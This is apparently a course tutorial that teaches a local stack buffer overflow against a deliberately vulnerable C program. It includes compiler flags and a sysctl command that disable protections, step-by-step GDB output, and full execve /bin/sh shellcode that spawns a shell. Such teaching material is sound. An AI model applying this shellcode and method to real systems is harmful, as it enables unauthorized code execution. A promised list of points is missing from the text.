Buffer Overflows

Introduction

Buffer overflow vulnerabilities used to be extremely common in software. These days they are getting more and more difficult to exploit. There tend to be fewer of these vulnerabilities found in higher profile software projects, but they still do happen. Many kernel and compiler level advancements have also made buffer overflows harder to exploit. Learning how to exploit these vulnerabilities is, however, a very good place to start to learn to hack.

Setup

In order to run this tutorial, you will need to be on a machine that does not have stack randomization enabled. You can use the machine netsec-playground.cs.northwestern.edu or disable stack randomization on your own machine with the following command:

sysctl -w kernel.randomize_va_space=0

This will make your machine more vulnerable to attackers, but when you reboot it, everything will go back to normal.

Tutorial

This tutorial will walk you through a simple, local stack-based buffer overflow example. Below is a short program, vulnerable.c, that mis-manages memory:

$ cat vulnerable.c 
#include <stdio.h>
#include <string.h>

void foo (char *arg) {
  char buffer[64];
  strcpy(buffer, arg);
}

int main(int argc, char *argv[]) {
  foo(argv[1]);
  return(0);
}

The program's input is a single argument. It copies the contents of that argument into a 64-byte buffer. First compile this program as shown below.

$ gcc -g -Wall -fno-stack-protector -z execstack -o vulnerable vulnerable.c

The complex gcc flags are necessary to allow stack-based exploitation on modern kernels. The program really doesn't do anything, but you can verify that it is in fact vulnerable with a simple command:

$ ./vulnerable `ruby -e 'print "A"*72'`
Segmentation fault

Now run the program through GDB, and pay close attention to the return address of foo (the value listed under saved eip).

$ gdb -q vulnerable
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break foo
Breakpoint 1 at 0x804837a: file vulnerable.c, line 6.
(gdb) run `ruby -e 'print "A"*72'` 
Starting program: /home/sam/vulnerable `ruby -e 'print "A"*72'`

Breakpoint 1, foo (arg=0xbffff912 'A' <repeats 72 times>) at vulnerable.c:6
6         strcpy(buffer, arg);
(gdb) info frame
Stack level 0, frame at 0xbffff710:
 eip = 0x804837a in foo (vulnerable.c:6); saved eip 0x80483af
 called by frame at 0xbffff720
 source language c.
 Arglist at 0xbffff708, args: arg=0xbffff912 'A' <repeats 72 times>
 Locals at 0xbffff708, Previous frame's sp is 0xbffff710
 Saved registers:
  ebp at 0xbffff708, eip at 0xbffff70c
(gdb) s
7       }
(gdb) info frame
Stack level 0, frame at 0xbffff710:
 eip = 0x804838c in foo (vulnerable.c:7); saved eip 0x41414141
 called by frame at 0xbffff714
 source language c.
 Arglist at 0xbffff708, args: arg=0xbffff900 "home/sam/vulnerable"
 Locals at 0xbffff708, Previous frame's sp is 0xbffff710
 Saved registers:
  ebp at 0xbffff708, eip at 0xbffff70c
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

The info frame command returns information about the current function's stack frame. The first call to info frame shows that eip's current position is at 0x804837a (yours will likely be different) and the address eip will return to when the function exits is 0x80483af (yours will be different again). After stepping passed the strcpy() function, info frame shows that foo will attempt to return to 0x41414141. The return address has been overwritten with the input string.

Now it's time to get a shell. To exploit this program all that is needed is some generic shellcode and the location of that shellcode in memory. Everything can be put together using some simple command-line programs.

$ printf "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh" > shellcode.bin
$ echo `cat shellcode.bin``ruby -e 'print "return_address"*2'`
?^?1??F?F
         ?
          ???V
              ̀1ۉ?@̀?????/bin/shreturn_addressreturn_address

The basic idea is to input the shellcode followed by its location in memory. A useful trick is to repeat the address of the shellcode as many times necessary to overwrite the function's return address. The important part is realizing that the shellcode's location in memory is simply going to be buffer's location in memory. There are also a few important points to remember:

With that in mind, step through the program again in GDB.

(gdb) run `cat shellcode.bin``ruby -e 'print "\xc8\xf6\xff\xbf"*10'`

Starting program: /home/sam/vulnerable `cat shellcode.bin``ruby -e 'print "\xc8\xf6\xff\xbf"*10'`

Breakpoint 1, foo (
    arg=0xbffff906 "�\037^\211v\b1�\210F\a\211F\f�\v\211�\215N\b\215V\f�\2001�\211�@�\200�����/bin/sh����������������������������������������")
    at vulnerable.c:6
6         strcpy(buffer, arg);
(gdb) x/s buffer
0xbffff6c8:      ".N=

Breaking at foo, it is clear that the argument indeed contains the shellcode (/bin/sh). That's good, but what about the address of the buffer? At this point, it's at the same address used in our exploit string. Everything is in place to step through the strcpy() and see what happens.

(gdb) s
7       }
(gdb) info frame
Stack level 0, frame at 0xbffff710:
 eip = 0x804838c in foo (vulnerable.c:7); saved eip 0xfff6c8bf
 called by frame at 0xbffff714
 source language c.
 Arglist at 0xbffff708, args: arg=0xfff6c8bf <Address 0xfff6c8bf out of bounds>
 Locals at 0xbffff708, Previous frame's sp is 0xbffff710
 Saved registers:
  ebp at 0xbffff708, eip at 0xbffff70c

What happened? The return address was definitely overwritten, and it looks vaguely similar to 0xbffff6c8, but something went wrong. The problem is that the shellcode isn't a multiple of four. The return address in the exploit string is no longer aligned correctly on the stack. Padding the shellcode with nop instructions to make it the correct length. A nop, short for 'no-operation', is an assembly instruction instructs the computer to do nothing for a cycle. On an x86 the binary for the nop instruction is \x90. One last run through GDB is below (note that the change in input changed the address of our buffer, though).

(gdb) run `ruby -e 'print "\x90"*3'``cat shellcode.bin``ruby -e 'print "\xb8\xf6\xff\xbf"*10'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/sam/vulnerable `ruby -e 'print "\x90"*3'``cat shellcode.bin``ruby -e 'print "\xb8\xf6\xff\xbf"*10'`

Breakpoint 1, foo (
    arg=0xbffff903 "\220\220\220�\037^\211v\b1�\210F\a\211F\f�\v\211�\215N\b\215V\f�\2001�\211�@�\200�����/bin/sh����������������������������������������")
    at vulnerable.c:6
6         strcpy(buffer, arg);
(gdb) x/s buffer
0xbffff6b8:      ".N=
(gdb) s
7       }
(gdb) info frame
Stack level 0, frame at 0xbffff700:
 eip = 0x804838c in foo (vulnerable.c:7); saved eip 0xbffff6b8
 called by frame at 0xbffff704
 source language c.
 Arglist at 0xbffff6f8, args: 
    arg=0xbffff6b8 "\220\220\220�\037^\211v\b1�\210F\a\211F\f�\v\211�\215N\b\215V\f�\2001�\211�@�\200�����/bin/sh����������������������������������������"
 Locals at 0xbffff6f8, Previous frame's sp is 0xbffff700
 Saved registers:
  ebp at 0xbffff6f8, eip at 0xbffff6fc

At this point, everything looks good. The exploit string uses the correct address for buffer and foo's return address has successfully been overwritten with that value. Continuing should execute a shell.

(gdb) c
Continuing.
Executing new program: /bin/dash
(no debugging symbols found)
Error in re-setting breakpoint 1: Function "foo" not defined.
(no debugging symbols found)
(no debugging symbols found)
$ echo about time                
about time
$ exit

Program exited normally.

Success! foo returned to the exact location of the shellcode in memory and execution resumed as normal. Exiting the shell allows vulnerable to exit normally.

Classwork

Get this same exploit to work outside of GDB. You can edit the source code to include something like a printf but, be aware, it is possible without touching the source.